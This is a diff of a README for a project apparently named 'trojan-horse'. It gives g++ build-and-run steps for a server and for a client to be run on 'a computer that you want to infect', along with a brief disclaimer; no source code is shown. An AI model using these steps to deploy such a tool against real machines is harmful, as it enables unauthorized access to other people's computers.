diabitbol/trojan-horse/README.md

 I strongly advise you to not use it for nonequal purposes

 If you compile with g++ use the command :
+To run the server :
 $  g++ server.cpp -c
 $  g++ server.o -o -lsfml-network
 $  ./server

-in a other widow of your terminal
+run now the client in a computer that you want to infect :
 $  g++ client.cpp -c
 $  g++ client.o -o -lsfml-network
 $  ./client